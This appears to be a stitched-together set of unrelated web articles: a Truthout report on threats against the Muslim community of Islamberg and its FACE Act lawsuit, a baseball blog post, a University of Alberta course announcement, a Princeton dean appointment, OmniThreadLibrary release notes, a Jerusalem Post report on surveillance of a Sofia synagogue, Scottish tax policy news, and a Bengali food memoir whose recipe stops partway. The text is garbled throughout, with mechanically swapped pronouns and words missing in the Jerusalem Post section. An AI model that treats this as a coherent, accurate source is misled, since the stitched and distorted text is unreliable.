A planned motorcycle protest against Islamberg, an African-American Muslim community in the Catskills, backfired on its organizers on May 15, 2016 when they were vastly outnumbered by hundreds of cheering Islamberg supporters who gathered to defend the community from charges that it is an “Islamic jihad training camp.” (Photo: Watershed Post / Flickr)
Support from readers provides Truthout with vital funds to keep investigating what mainstream media won't cover. Fund more stories like this by donating now!
When residents of the small village of Islamberg, New York, a community of Sunni Muslims located approximately 150 miles north of Manhattan, learned that former congressional candidate Robert Doggart had been arrested for planning to burn down their mosque and assassinate inhabitants as they went about their chores, they knew it was time to go on the offensive.
As the headquarters of The Muslims of America, Inc. (TMOA), the 70-acre community of Islamberg was formed in the early 1980s by a group of Black Muslims from Brooklyn. They were seeking a calmer life, far from the noise, pollution and hustle of the city — a place where they could farm and raise their children closer to nature. They also wanted to devote themselves, to the extent possible, to spiritual concerns. TMOA has since grown to 12 domestic and international communities in Georgia, New York, South Carolina, Tennessee, Texas and Virginia, and as well in Canada, Trinidad/Tobago and Venezuela.
Not surprisingly, Islamophobes — the Center for Security Policy, the Christian Action Network, the Clarion Project, and Fox News, among the most prominent — have decried the hamlets as possible terrorist training sites and have subjected residents to a constant barrage of verbal smears, threats and disruptions.
According to Muhammad Matthew Gardner, spokesperson for TMOA and a resident of a TMOA enclave in south-central Virginia called Ahmadabad, the Christian Action Network has been particularly relentless in targeting the settlement and trying to “find a way to make Islam the enemy.” Several years ago, the network's representatives attended a meeting of their town's board of supervisors to demand — unsuccessfully — that a street named in honor of TMOA's spiritual leader, Sheikh Mubarak Ali Shah Gilani, be rebranded. In addition, until quite recently, they surveilled residents, driving their cars past houses at five miles an hour and glaring at the men, women and children who call the area home. Gardner further reports that the Christian Action Network has also sent camera crews into Ahmadabad to film local people.
“From our founding in the 1990s, we always had an open door policy,” they said. “People could just show up and be welcomed. But after [network members] barged in with cameras a few years back, and had people get out of their cars and run up to children and ask them if they were terrorists or were going to blow up buildings, we became a gated community with 24-hour security to keep trespassers away.”
Other TMOA settlements tell a similar tale. The TMOA website reports that in 2013, Joshua Allan Casey was charged with unlawfully discharging a firearm and trespassing on TMOA property in York, South Carolina. And in August 2015, Glendon Scott Crawford, a 51-year-old member of the United Northern and Southern Knights of the Ku Klux Klan, and a resident of Galway, New York, was convicted of building “an industrial strength radiation device that could kill silently without victims knowing they were getting sick,” according to the Southern Poverty Law Center (SPLC). Crawford had intended to place the machine in a truck painted with the words Halal Chicken and pump odorless poison into the Islamberg mosque while parishioners prayed. They called the contraption “Hiroshima on a light switch.” After a trial in US District Court in Albany, New York, they were convicted and sentenced to 25 years in prison; their partner in crime, Eric J. Feight, was sentenced to 97 months in jail. Feight was granted a shorter sentence in exchange for testifying against Crawford, the plot's mastermind.
When the people of Islamberg learned of Doggart's plans to firebomb their mosque and stab and shoot at random Muslims, they had had enough. They decided it was time to sue.
Their weapon: The Freedom of Access to Clinic Entrances Act (FACE).
FACE was promulgated in 1994 to protect abortion clinics — as well as places of worship — from intrusions and to protect patients, medical workers and congregants from harassment and intimidation.
Tahirah Amatul-Wadud is one of two attorneys representing the townspeople of Islamberg in a civil case against Doggart, their “assistant” William Tint of South Carolina, and numerous as-yet unnamed coconspirators. “We believe that we are the leaders in using FACE this way, on behalf of Muslims and in support of a mosque, but Congressman Keith Ellison [D-Minn.] wrote Attorney General Loretta Lynch a letter last year, asking them to employ the FACE Act to prosecute protesters in Arizona who stood outside Phoenix mosques with weapons,” Amatul-Wadud said. “Right now we're in the process of trying to stay the civil case against Doggart and the others until a criminal case being brought by the Department of Justice [DOJ] is decided.”
Amatul-Wadud is heartened that the DOJ is moving forward in its prosecution of Doggart and company. At the same time, they and co-counselor Tahirah Clark emphasize that Doggart is being handled with kid gloves. “After Doggart came to DOJ attention — the FBI legally intercepted their social media pages after their threats were brought to their attention,” Amatul-Wadud said. “Afterwards, they went before a judge to obtain permission to wiretap their phone. Then, after they were arrested, it took just four weeks for DOJ to make a plea deal with him. They let them out of jail as soon as they made bail. When we learned about the deal — allowing them to plead guilty to making communication threats, a crime that could result in a fine and short jail term — we called a press conference and denounced the arrangement.”
Shortly thereafter, in late 2015, a senior judge rejected the plea and began readying the parties for a full-blown criminal trial. Doggart is presently on house arrest and wears an electronic monitor but was recently permitted to travel to Kentucky where they were examined by medical professionals and deemed fit to stand trial. The attorneys expect litigation to begin sometime this fall.
As for the civil part of the case, attorneys Clark and Amatul-Wadud have a straightforward goal. According to the complaint in TMOA v. Doggart, the Muslims of America want the court to order Doggart and colleagues to pay compensatory damages of at least $50,000 to TMOA. But this is about far more than money. As Clark explains, “We want what all Americans want, to live freely, raise our children in peace, and live our lives. Doggart and their allies have plotted terrible things against innocent people, to burn down our place of worship and kill us. This should not be acceptable in this country. We want the US government to go after these men in the same way they go after Muslims who are accused of terrorism.”
Amatul-Wadud agrees, pointing out that Doggart was never charged with domestic terrorism. “When Muslims search the Internet for ISIS or Al Qaeda, they are usually quickly charged as terrorists. We are bringing this case to draw attention to the extreme right wing since they pose the greatest threat to the security of the US.”
While disgusted at this blatant prosecutorial double-standard, both Clark and Amatul-Wadud are also critical of conservative media outlets that fan the flames of religious bigotry.
“When Fox News gets people riled up, it causes our communities to become targets of vigilante justice,” says Amatul-Wadud. “Doggart is a manifestation of this. Their attorney has said that Doggart became aware of TMOA and Islamberg after watching a program on Fox News in January 2015. A guy named Wayne Simmons — who incidentally was sentenced to 33 months in prison and fined more than $175,000 last month for falsely presenting themselves as a former CIA operative with expertise on terrorism — was being interviewed. They were describing 22 alleged terrorist training camps in the US, including one in Islamberg. Doggart heard this and turned their attention on TMOA to stop what they perceived as a threat.”
Mark Potok, director of publications and information at the SPLC and editor-in-chief of its Intelligence Report, calls Doggart “a classic example of the kinds of people and the kinds of crimes that are unleashed by internet conspiracists, and people like Sean Hannity, who articulate danger fantasies.” When such falsehoods are endlessly repeated, they stoke fear and more than a few people have felt inspired to do something to remove the perceived menace, however bogus. Last year, Potok reports, Republican Congressman Duncan Hunter of Texas went on a tear after hearing a “news report” alleging that there was an ISIS training facility across the border from San Antonio. And although every authority in Texas decried this baseless assertion, it led to a predictable spike in anti-Muslim hate crimes.
“We know people are suspicious of us,” TMOA spokesperson Gardner admits, “so we've had to develop good relationships with local law enforcement personnel and the FBI. We've invited them to visit us, look around and ask questions. In my Virginia community, the local member of congress and representatives of the FBI, ATF, CIA and police force came in and spent time with us. They later went to the board of supervisors and very clearly told them that they had nothing to fear. In fact, they told them that non-Muslims could learn a lot from us. This happened in 2008 and really changed things. People from the adjacent towns no longer look at us strangely. We've also been proactive and every other Saturday we go to the public library to talk to people about Islam and about our community.”
The residents of Islamberg have also done considerable outreach. In fact, after American Bikers United Against Jihad staged a ride through the town in May, anti-racist activists and rank-and-file townspeople mobilized and easily outnumbered the motorcyclists. A little more than a month later, the New York State Council of Churches organized several actions during Ramadan. Several hundred lawn signs wishing Muslims a “blessed” month went up in surrounding locales, and end-of-fast Iftars brought people of different religions together to share a meal.
Meanwhile, Islamberg residents and the Jewish community in Oneonta, New York, are planning a joint program for the fall.
“Islamberg and other TMOA communities are not closed,” Clark says. “Residents work outside the community and go to college or university. Our kids participate in local sports teams, although most parents either home school their children or send them to an Islamic school in a nearby town.”
This engagement, adds Amatul-Wadud, has led to improved relationships with non-Muslims. In part due to the ongoing harassment, Islamberg residents have formed deep bonds with people in Hancock and nearby Binghamton and Oneonta. “There is a level of solidarity we probably would not have been able to find without people like Doggart, Tint and Sean Hannity,” they laugh. But despite this “silver lining,” they and Clark hope that their FACE case will be successful in beginning to confront the bigotry that has been lobbed at TMOA and those who reside within its communities.
Exactly one year to the date after Stephen Strasburg and Danny Espinosa stated that they think they are better than the Braves, the general manager of the team came out and said the same thing.
Here are a few quotes from last year:
"They're good, I don't think they're better than us," Danny Espinosa said. "They're a good ballclub, they have talent. They're hot right now, they only lost one game, but they're hot. It all evens out."
"Honestly, I think our lineup's better," Strasburg said. "They're hot right now. It's early and it's not about how many wins you necessarily finish up with in April, it's how many you have at the end of the year."
They are correct, it's about how many you have at the end of the year. The Braves had 96 and the Nats failed to make the playoffs. Here is Rizzo's quote from earlier today;
Mike Rizzo on the Braves: "We feel that we're better than this team. We respect them & respect the organization. We don't fear them." — James Wagner (@JamesWagnerWP) April 13, 2014
Now, of course Rizzo thinks they are better; they built the team. They have no reason not to have confidence in their squad. The hilarity of saying the same exact thing, without ever actually proving it, one year to the date after two of their players got egg on their face, is just incredible.
It's a bit like Netflix for mountain lovers.
Starting this fall, the University of Alberta's Canadian Mountain Studies Initiative will offer Mountains 101 as an online course.
“They're free for anyone to take anywhere in the world, as long as you have an internet connection,” said Zac Robinson, an assistant professor at the University of Alberta and one of the three content producers for the course.
It will be a general introduction to the mountain world and include up to 30 researchers exploring everything from glaciology and ecology to mountain culture and literature.
Mountains 101 is the third in a series of massive open online courses — also known as MOOCs — being offered by the U of A.
“They're very different beasts,” said Robinson. “It's all high-end, documentary style, scripted and filmed with a narrator in front of green screens and a bunch of on-site shooting.
“Every three or four minutes, there's some sort of interactive activity built in.”
Robinson, who noted users can take their time taking the course or “binge take it like Netflix,” said there are two other MOOCs on dinosaurs and video games that have proven to be hugely popular.
“They're getting enrolments of up to 50,000 students in a year,” they said.
They decided it made sense to expand the course offerings to mountains, considering the U of A's proximity to the Rockies.
“We've got a whole host of folks who work on mountain peoples or mountain activities or mountain places from across the disciplines,” said Robinson, noting they have connected through the Canadian Mountain Studies Initiative.
The course, which is also available for school credit, will be produced and promoted in partnership with Parks Canada.
“We were approached by the U of A with their intentions, their vision for the mountain studies program,” said Pat Thomsen, executive director of mountain parks for Parks Canada. “I saw a natural alignment of the kind of program they are looking to launch in terms of not just the physical, but the cultural, spiritual, artistic, historic stories of mountains.”
Thomsen said they will work with the university to develop the content and provide access to their experts in the mountain national parks.
“We will be providing access to video, pictures, people,” they said, noting it will feature sites in Banff, Jasper, Yoho, Kootenay and Glacier national parks.
They are also partnering with the Alpine Club of Canada, which has offered the film crew access to its network of remote backcountry huts, and Mountain Equipment Co-op, which will provide gear and assistance with a series of tips on safe and responsible travel in the backcountry.
Sanjeev Kulkarni, dean of the Princeton University Graduate School and a professor of electrical engineering, has been appointed dean of the faculty effective July 1.
Sanjeev Kulkarni, dean of the Princeton University Graduate School since 2014 and a professor electrical engineering, has been appointed dean of the faculty effective July 1.
President Christopher L. Eisgruber recommended the appointment, which the Board of Trustees approved at their June 5 meeting. Kulkarni will succeed Deborah Prentice, who will become University provost on July 1.
"Sanj Kulkarni has served with distinction as dean of the Graduate School, and I am delighted that they have agreed to take on this new role," Eisgruber said. "His own interdisciplinary research, their wide-ranging service to the University and their leadership of the Graduate School have given them a deep appreciation for the values shared throughout our University and the scholarly practices that distinguish our departments.
"Sanj is a wise counselor and an effective administrator who is dedicated to ensuring our faculty's quality and well-being. I am confident that they will be an excellent dean of the faculty," Eisgruber said.
Kulkarni, who became dean of the Graduate School in April 2014, is an associated faculty member in the Department of Operations Research and Financial Engineering (ORFE) and in the Department of Philosophy.
Kulkarni said they are delighted to have the opportunity to serve the University in this new role. “Faculty are the foundation of any great university, and it will be a pleasure and an honor to work with and support Princeton's outstanding faculty. I look forward to working with scholars, teachers, and researchers across the full range of academic departments and programs at the University,” they said.
As dean of the Graduate School, Kulkarni led the strategic planning Task Force on the Future of the Graduate School, implemented a sixth-year funding program for graduate students in the humanities and social sciences, and with the dean for research implemented tuition matching funds for faculty who support fourth- and fifth-year graduate students on sponsored research.
Under Kulkarni's leadership, the Graduate School created an assistant dean position for professional development and developed a number of new programs including the University Administrative Fellows, opportunities for collaborative teaching between Princeton faculty and graduate students, and a partnership with Mercer County Community College to provide teaching opportunities and mentorship for Princeton graduate students.
Over the past three years, the Graduate School also increased the diversity of entering graduate student cohorts, enhanced student life activities, boosted the integration of graduate students into the University community, and advanced discussions on housing for graduate students as part of the University's campus planning effort. Kulkarni has also been active in alumni engagement, hosting events on campus and visiting alumni groups across the country and abroad.
Kulkarni has had a distinguished career as a researcher, educator and administrator at Princeton, where they joined the faculty in 1991. They served as associate dean for academic affairs in the School of Engineering and Applied Science from 2003 to 2005; was the head of Butler College, an undergraduate residential college, from 2004 to 2012; and from 2011 to 2014 was director of the Keller Center, which has the broad aim to “educate leaders for a technology-driven society.”
Kulkarni holds a bachelor's degree in electrical engineering and bachelor's and master's degrees in mathematics, all from Clarkson University. After completing a master's degree in electrical engineering at Stanford University, they earned their Ph.D. in electrical engineering at the Massachusetts Institute of Technology.
Their research interests include statistical pattern recognition, machine learning, nonparametric estimation, information theory, wireless networks, signal/image/video processing, and econometrics and finance. They have worked extensively with colleagues in philosophy, computer science, psychology and ORFE.
Kulkarni received an Army Research Office Young Investigator Award in 1992, and a National Science Foundation Young Investigator Award in 1994. They have also received several teaching awards at Princeton, including the President's Award for Distinguished Teaching in 2007, and seven awards from the Undergraduate Engineering Council for courses on computer vision, image processing, and signals and systems.
Kulkarni is a fellow of the Institute of Electrical and Electronics Engineers (IEEE), and they have served as an associate editor for the IEEE Transactions on Information Theory.  They are on the Board of Trustees for Clarkson University.
They have served as a trustee of Princeton University Press, and has been on the Healthier Princeton Advisory Board, the Frist Campus Center Advisory Board and the Alcohol Coalition Committee. They currently serve on the Sustainability Steering Council, the faculty advisory committee for Labyrinth Books and the Princeton Entrepreneurship Council.
Prentice, Princeton's Alexander Stewart 1886 Professor of Psychology and Public Affairs, was named dean of the faculty in 2014 after serving for 12 years as the chair of the Department of Psychology. As provost, they will succeed David S. Lee, a professor of economics and public affairs who is returning to the faculty.
Prentice will lead a committee to search for a successor to Kulkarni, and its work will begin immediately. During the interim, Cole Crittenden, deputy dean of the Graduate School, will serve as acting dean.
As there were no error reports related to OmniThreadLibrary 1.05 RC, I've released final 1.05 version just few moments ago. There are almost no changes between the RC and final release – one demo was added and Parallel.Join code was tweaked a little.
You can download OTL 1.05 from the Google Code. Alternatively, you can update SVN trunk (checkout instructions) or checkout the release-1.05 tag.
Support is available on the web discussion forum.
Big rename
Many internal classes and interfaces was renamed. This should not affect most of the users.
TOmniBaseStack –> TOmniBaseBoundedStack
TOmniStack –> TOmniBoundedStack
TOmniBaseQueue –> TOmniBaseBoundedQueue
TOmniQueue –> TOmniBoundedQueue
IInterfaceDictionary –> IOmniInterfaceDictionary
IInterfaceDictionaryEnumerator -> IOmniInterfaceDictionaryEnumerator,
TInterfaceDictionaryPair –> TOmniInterfaceDictionaryPair
I'm sorry for that. Some names are badly chosen and some did not follow the OTL naming conventions.
Dynamic lock-free queue
Implemented dynamically allocated, O(1) enqueue and dequeue, threadsafe, lock-free queue. Class TOmniBaseQueue contains base implementation while TOmniQueue adds observer support. Both classes live in the OtlContainers unit.
Read more about the TOmniQueue: Dynamic lock-free queue – doing it right.
Inverse semaphore
Implemented resource counter with empty state signalling TOmniResourceCount (unit OtlSync).
Read more: Three steps to the blocking collection: [1] Inverse semaphore.
Blocking collection
New unit OtlCollection which contains blocking collection implementation TOmniBlockingCollection.
Read more: Three steps to the blocking collection: [3] Blocking collection
Parallel
New high-level parallelism support (unit OtlParallel). Requires at least Delphi 2009.
Two parallel control structures are supported: for each (with optional aggregator) and join.
The demo for Parallel.ForEach can be found in project 35_ParallelFor. The same code is reprinted near the end of the Three steps to the blocking collection: [3] Blocking collection post.
Parallel.ForEach.Aggregate was described in Parallel.ForEach.Aggreate post and is demoed in project 36_ParallelAggregate.
At the moment ForEach is fairly limited. It can iterate over a range of numbers or over a collection supporting the IOmniValueEnumerable interface (TOmniBlockingCollection, for example). The second limitation will be removed in the future. The plan is to support any collection that implements IEnumerable.
Parallel.Join is very simple code that executes multiple tasks and waits for their completion. It was designed to execute simple tasks that don't require communication with the owner. It is demoed in project 37_ParallelJoin.
Environment
Unit OtlCommon contains new interface IOmniEnvironment and function Environment that returns singleton of this type. Environment can be used to query some basic information on system, process and thread. Some information (for example process and thread affinity) can also be modified using the same interface.
IOmniAffinity = interface
property AsString: string ;
property Count: integer;
property Mask: DWORD;
end ;
IOmniProcessEnvironment = interface
property Affinity: IOmniAffinity;
property Memory: TOmniProcessMemoryCounters;
property PriorityClass: TOmniProcessPriorityClass;
property Times: TOmniProcessTimes;
end ;
IOmniSystemEnvironment = interface
property Affinity: IOmniAffinity;
end ;
IOmniThreadEnvironment = interface
property Affinity: IOmniAffinity;
property ID: cardinal;
end ;
IOmniEnvironment = interface
property Process: IOmniProcessEnvironment;
property System: IOmniSystemEnvironment;
property Thread: IOmniThreadEnvironment;
end ;
Newer demos are using some parts of the Environment interface. For example, in demo 33_BlockingCollection, process affinity is set with
Environment.Process.Affinity.Count := inpNumCPU.Value;
while the demo 35_ParallelFor uses following code fragment to query process affinity
numTasks := Environment.Process.Affinity.Count;
Cancellation token
New interface IOmniCancellationToken is used in the Parallel.ForLoop (see post Three steps to the blocking collection: [3] Blocking collection for the example) and in IOmniTaskControl.TerminateWhen.
IOmniTaskControl and IOmniTask implement CancellationToken: IOmniCancellationToken property which can be used by the task and task controller.
IOmniCancellationToken is just a simple wrapper around the Win32 event primitive and is defined in the OtlSync unit.
IOmniCancellationToken = interface
procedure Clear;
function IsSignaled: boolean;
procedure Signal;
property Handle: THandle;
end ;
Message dispatcher
IOmniTaskControl now implements message dispatching setter in form OnMessage(msgID, handler). Use it to route specific message IDs to specific functions when global TOmniEventMonitor is not used.
An example from one of my applications:
spmDatabaseConn := CreateTask(
TSttdbPlaylistDatabaseWorker.Create(),
'Playlist Monitor Database Connection' )
.SetParameters([serverAddress, serverPort, username, password])
.SetTimer( 15 * 1000 , @TSttdbPlaylistDatabaseWorker.CheckDBVersion)
.OnMessage(MSG_DB_ERROR, HandleError)
.OnMessage(MSG_DB_STATUS, HandleDatabaseStatus)
.OnMessage(MSG_DB_VERSION, HandleDatabaseVersion)
.Run;
UserData[]
Implemented IOmniTaskControl.UserData[]. The application can store any values in this array. It can be accessed via the integer or string index. This storage is can only be access from the task controller side. Access is not thread-safe so you should use it only from one thread or create your own protection mechanism.
Small changes
IOmniTask implements Implementor property which points back to the worker instance (but only if worker is TOmniWorker-based).
Refactored and enhanced TOmniValueContainer.
TOmniTaskFunction now takes 'const' parameter.
TOmniTaskFunction = reference to procedure(const task: IOmniTask).
TOmniTaskFunction = reference to procedure(const task: IOmniTask). Implemented TOmniValue.IsInteger.
Bugs fixed
TOmniEventMonitor.OnTaskUndeliveredMessage was missing 'message' parameter.
Set package names and designtime/runtime type in D2009/D2010 packages.
New demos
32_Queue: Stress test for new TOmniBaseQueue and TOmniQueue.
33_BlockingCollection: Stress test for new TOmniBlockingCollection, also demoes the use of Environment to set process affinity.
34_TreeScan: Parallel tree scan using TOmniBlockingCollection.
35_ParallelFor: Parallel tree scan using Parallel.ForEach (Delphi 2009 and newer).
36_ParallelAggregate: Parallel calculations using Parallel.ForEach.Aggregate (Delphi 2009 and newer).
Labels: Delphi, multithreading, OmniThreadLibrary, open source, programming
Dear Reader, As you can imagine, more people are reading The Jerusalem Post than ever before. Nevertheless, traditional business models are no longer sustainable and high-quality publications, like ours, are being forced to look for new ways to keep going. Unlike many other news organizations, we have not put up a paywall. We want to keep our journalism open and accessible and be able to keep providing you with news and analysis from the frontlines of Israel, the Middle East and the Jewish World.
BERLIN – A US-based think tank report has uncovered surveillance by Iranian militia Qods Force of the only synagogue in the Bulgarian capital of Sofia. This suggests possible preparations for terrorist activity, similar to the case of the Hezbollah member convicted in Cyprus late last month for plotting to kill Israeli tourists on the island.
In the earlier case Hossam Taleb Yaacoub – a self-confessed member of Hezbollah – monitored flights from and to Israel and hotel and kosher restaurant establishments where Israelis were present.
Hizballah and the Qods Force in Iran's Shadow War with the West
The Jerusalem Post
Post
Post
Post
Post
Post
Post
Post
According to a 2013 Washington Institute for Near East Policy report titled, “within days after the explosion in Burgas — while the investigation into the bombing and the search for accomplices was at its height — Bulgarian authorities reportedly caught a Qods Force operative scoping out a synagogue in the country's capital.”Israeli intelligence officials disclosed the Qods Force surveillance of the Sofia synagogue to the report's author, Dr. Matthew Levitt, a leading authority on Hezbollah and director of the Stein Program on Counterterrorism and Intelligence at the Washington Institute.Tsvetan Tsvetanov, then-Bulgarian interior minister, announced in February that Hezbollah operatives had been responsible for the Burgas bus attack resulting in the murders of five Israelis and a Bulgarian national. Tsvetanov said the two suspected perpetrators “were members of the militant wing of Hezbollah” and added that investigators had found information “showing the financing and connection between Hezbollah and the two suspects.”After the Burgas terror attack in July, US and Israeli officials attributed the bus bombing to a joint Hezbollah-Iranian operation.Bulgarian sources who wished to remain anonymous toldon Monday that Bulgaria's authorities, including top members of the security services, were made aware of ongoing Hezbollah-Iranian threats against Jews and Israelis in Bulgaria, prior to the Burgas attack. According to the sources, multiple Bulgarians “passed information a number of times” to security forces about planned Hezbollah attacks.The Bulgarian intelligence was put on notice by Israel since 2012.Danny Shenar, head of security at the Tourism Ministry, warned European authorities in general and Bulgaria in particular in early January 2012 that Hezbollah planned attacks on Israelis. They urged the Europeans to enhance their security measures.However, Bulgarian sources told thethat counterterrorism officials in Sofia were disturbingly lax in considering possible terror plots on Bulgarian soil ahead of the Burgas bus bombing.Thereported in 2011 that Hezbollah sought to attack Israelis in Europe. A January 2012 picture on the online news site Ynet showed a photograph of the enormous Sephardi synagogue in Sofia with a caption reading “Possible target? The Great Synagogue in Sofia.”The new material disclosed by theadds additional hard evidence to a possible joint Hezbollah-Iranian operation to attack the synagogue. It is unclear if the Iranians were acting independently of Hezbollah, their main proxy, as a lone wolf operation in the small Eastern European country, or cooperating with Hezbollah.According to the Washington Institute report, “Around the same time that authorities foiled a January 2012 plot targeting Israeli vacationers in Bulgaria – just weeks ahead of the anniversary of Mughniyah's assassination— another Hezbollah plot was disrupted in Greece.”Imad Mughniyah, on the European Union's terror list, was assassinated in 2008 in Damascus. Mugniyah, a senior Hezbollah member, was indicted in Argentina for their alleged role in the 1992 Israeli embassy attack in Buenos Aires. Hezbollah attributed the targeted killing of Mughniyah to Israel and declared retaliation.Asked about the surveillance and arrest of an Iranian Qods force operative in Sofia, Dimitar Yaprakov, a Bulgarian foreign ministry spokesperson, answered theby email on Monday that “you may address [your questions] to the Ministry of Interior of Bulgaria.”In response to aquery, a press spokesperson from the Interior Ministry wrote “Such kind of information does not fall within the scope of the competence of MoI, it falls within the competences of SANS, the State Agency for National Security.”A spokesperson for SANS told theby phone that the security agency would work on a reply.Asked about whether Bulgaria would recommend that the EU include Hezbollah on its terror list because a Bulgarian national—the bus driver Mustafa Kyosev – was allegedly murdered by Hezbollah, the foreign ministry spokesperson Yaprakov wrote, “Bulgaria will provide our partners and allies with all the evidence uncovered in the investigation, but will not initiate the procedure to include certain groups or individuals in the banned list of the European Union.”Dr. Wahied Wahdat-Hagh, an expert on Iran's regime and its terrorism apparatus, told the“the European Union must, in consideration of the terrorist activities of Hezbollah over the last 30 years, finally draw a lesson and ban this terror organization.”Wahdat-Hagh, a senior fellow with the Brussels-based European Foundation for Democracy, said postponing the problem regarding a prohibition of Hezbollah would merely lead to a greater problem on European soil.
Join Jerusalem Post Premium Plus now for just $5 and upgrade your experience with an ads-free website and exclusive content. Click here>>
SCOTLAND'S left alliance Rise will promise to introduce a higher income tax rate for the most wealthy one per cent of Scots in its first election campaign to win seats at Holyrood.
The pledge will involve raising the top rate of for those earning more than £150,000 a year from 45p to 60p and will be an attempt to rebalance the economy which they say is “rigged in favour of the rich”.
Full details of the policy will be unveiled in a pre-manifesto report to be published within the next few weeks but preliminary research by the group suggests it would raise an extra £100m a year in revenue.
Part of the extra public money would be spent on a new Economic Justice Fund to provide financial help to benefit claimants who had been sanctioned in a bid to eradicate food poverty and also on specialist tax inspectors tasked with cracking down on rich tax dodgers.
“Britain's economy is rigged in favour of the rich, but massively unequal societies are dysfunctional.
“A higher rate of tax on the rich will help reduce inequality in Scotland, and help build an economy that serves working class Scots, not just a wealthy minority at the top,” a Rise spokesperson told The National.
“We'll spend a portion of the additional revenue on a specialist team of Revenue Scotland tax inspectors dedicated to making elite tax avoiders and evaders pay their share.”
Scottish Labour said last year it would introduce a 50p top rate of tax for those earning more than £150,000 and use the additional revenue to establish a Fair Start fund in schools to support children from poorer backgrounds.
Both the Rise and Labour policies, however, depend on a fiscal framework accompanying the Scotland Bill being agreed between the Scottish and UK Governments.
Under the Bill, the Scottish Parliament will be given the power to set rates and bands of income tax from April 2017, keep half of all VAT receipts, and be given the ability to top up welfare benefits and create new payments.
Rise is planning to run campaigns in all eight of the country's regions in a bid to get seats via the proportional representation list.
Activist Cat Boyd, co-founder of the Radical Independence campaign, and a columnist for The National, and the former Scottish Socialist Party MSP Colin Fox and Jean Urquhart, current Independent MSP for the Highlands and Islands are among its lead candidates. They will not be fielding candidates in constituency seats.
Rise's policies include the abolition of council tax in favour of a Scottish services' tax that is income based, the abolition of charitable status for private schools and also supports an independent Scotland cutting all links with the monarchy.
Rise grew out of grassroots support for the Yes campaign in the independence referendum and its name is an acronym standing for Respect, Independence, Socialism and Environmentalism and it regards itself as committed to green and socialist principles. The Scottish Socialist Party (SSP) is affiliated to the alliance, but retains autonomy.
It is likely to face competition on the list from the SNP and the Scottish Greens, but is also campaigning to pick up votes from former Labour supporters.
A Scottish Greens spokesperson said: “A strong group of Green MSPs will use the powers coming to the next session of parliament to work for a shift from taxation on labour to taxing wealth, in essence, a more progressive system of taxation which focuses on ability to pay.”
It was November last year when my work took me to a major checkpost at the India-Bangladesh border in Agartala. Between the two countries, where the border literally separated backyards from houses and split families into half, I suspected while talking to Bengalis from both sides that it was a partition that still hasn't attained closure in the collective Bengali psyche.
There are too many things that bind Bengalis on both sides. Language, literature, love of a good argument, food and of course the love-hate relationship between ghotis from West Bengal and bangals from erstwhile East Bengal, now Bangladesh. That is why, standing at the checkpost, my thoughts were with Baba, my father, and Thamma, my grandmother.
I am born and raised in a Bengali family in Assam. To many confused fellow citizens, I have tried explaining that one can belong to Assam but speak Bengali. At home, in fact, only unadulterated Bengali was spoken, learning the script was a must and though we would happily eat an Assamese meal at homes of friends, the food at home was always strictly Bengali.
Neither did any of the Bengali families around us, most of which had either been displaced from East Bengal or had roots they could never go back to, deviate from this staunch food affiliation, especially the generations that had witnessed Partition. It was the same with Baba and Thamma.
“Desher barite janish... ", or “back in the desher bari… ", was how a lot of conversations began. Desher bari—which literally means “the country home", but more appropriately translates to “ancestral home" or, in this case, “the home in the motherland"—was firmly Sylhet (in Bangladesh), no matter where they lived.
A few weeks ago, I posted a photograph of kumropata diye illish, or hilsa wrapped in pumpkin leaves, in a food group on Facebook and a fellow foodie commented saying it reminded them of their grandmother's conversations that began with—what else?—“Desher barite janish... "
I realized that for a lot of us whose grandparents and parents had roots in opaar Bangla (Bengal on the other bank), this particular phrase is what stories began with. I remember this is how Thamma's and Baba's stories would begin too.
Most of these stories revolved around childhoods and invariably turned to food. There would always be a poignant pause for a few seconds before the story began, as their minds went back to their village homes in Bangladesh. You could see it in their eyes—they were back in the fields that produced the sweetest vegetables and wading through the large hawors (a type of water body) that yielded the tastiest fish.
Nothing anywhere tasted as good as the stuff they had in desher bari. I have listened to a well-known, globetrotting octogenarian energy expert talk about their childhood spent eating fish curry and rice with their father's boatmen in Mymensingh. And a retired government officer talk about small fishes that they and their younger brother caught from village ponds that mother fried to crisp. The taste of sweets that the local shops made in Bikrampur…
They all had the same look in their eyes when they told these stories.
My Thamma would usually pull me close at bedtime and tell me these stories. I was a naughty child and this was a perfect antidote to my revelry. It was awe-inspiring at the age of five or six to imagine that my silver-haired grandmother was once my age.
It was from them I learnt that they and their sisters would forage the tender stems of water lilies from ponds; they would be made into scrumptious stir fries with mustard paste, or covered in batter and deep fried into crunchy treats. Alas, as close as Assam's weather was to Sylhet, water lily stems were not sold in our local markets.
And then there were countless leafy greens like susni (four-leaf clover), halencha (watercress) and kochu (taro) that they said recalled foraging. Some aided in digestion, some were good for immunity, while others provided nutrition.
Then there were stories about koi, or climbing perches, fish that "walk" across fields and on muddy village roads during the monsoon, where they were caught by young boys and turned into the rich tael koi in the kitchens. It was from them that I learned the importance of resting fields, rotating crops and seasonal eating, and the trick of applying crushed leaves of marigold on minor wounds to stop bleeding.
And then there were songs, limericks and personal anecdotes. I never tired of listening to any of this.
It was always difficult, though, hearing the regret in Baba's voice as they talked about a home to which they would never be able to return. When they spoke, they became a person I did not quite know. We, who have never been forcefully displaced, can never truly understand the pain of it.
These stories were their only milestones of a life left behind—milestones buffed, polished and gleaming with every narration. They zealously held on to the food they carried from the land of their childhoods. It was one of the few things they were able to bring with them.
Kumropata diye illish was one such story. The mild, humid weather of Sylhet made every leaf sweet and tender. The small hawors around the house turned into gigantic rivers during the monsoon and the hilsa that the fishermen delivered on those mornings glistened silver. The smell alone would draw in the neighbours.
The mustard paste was pungent, ground using a stone mortar and pestle; the mustard oil would water everyone's eyes. When everything came together in the expert hands of my grandmother, it was nothing short of divine.
As Baba would put it, “It is sad tha will never experience such taste." That taste could never be recreated outside their desher bari.
Author Sybille Bedford had written that “cooking is at once the most and the least localized of the arts; it owes it development to commerce and to travel, and its preservation to stout regionalism".
Years and many a food journey later, a part of me craves for the food I ate in Assam and can't find in Delhi. It is partly climate and mostly nostalgia. That is why, when the BSF guard at the checkpost in Agartala chattily informed me that hilsa was one of the most traded goods there, I wasn't surprised.
Kumropata diye Ilish Paturi
You will need:
Medium-sized leaves of bottle gourd: eight
Ilish steaks: four
Freshly-ground mustard paste: two heaped tablespoons
Turmeric powder: one plus one teaspoon
Red chilli powder: one teaspoon
Mustard oil: one plus one tablespoon
Nigella seeds: half a teaspoon
Green chillies: four
Salt to taste
Method of preparation
1. Wash and dry the bottle gourd leaves.
2. Marinate the fish steaks with one teaspoon each of turmeric and salt and keep aside for 10 minutes.
